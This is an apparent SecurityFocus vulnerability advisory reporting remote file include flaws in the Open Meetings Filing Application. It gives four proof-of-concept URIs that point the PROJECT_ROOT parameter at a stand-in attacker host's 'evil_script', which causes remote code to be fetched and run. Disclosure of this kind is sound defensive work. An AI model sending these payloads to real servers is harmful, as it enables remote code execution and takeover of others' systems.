Open Meetings Filing Application Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[script_path]/editmeetings/session.php?PROJECT_ROOT=http://www.example2.com/evil_script?
http://www.example.com/[script_path]/email/session.php?PROJECT_ROOT=http://www.example2.com/evil_script?
http://www.example.com/[script_path]/entityproperties/session.php?PROJECT_ROOT=http://www.example2.com/evil_script?
http://www.example.com/[script_path]/inc/mail.php?PROJECT_ROOT=http://www.example2.com/evil_script?


 

Privacy Statement
Copyright 2010, SecurityFocus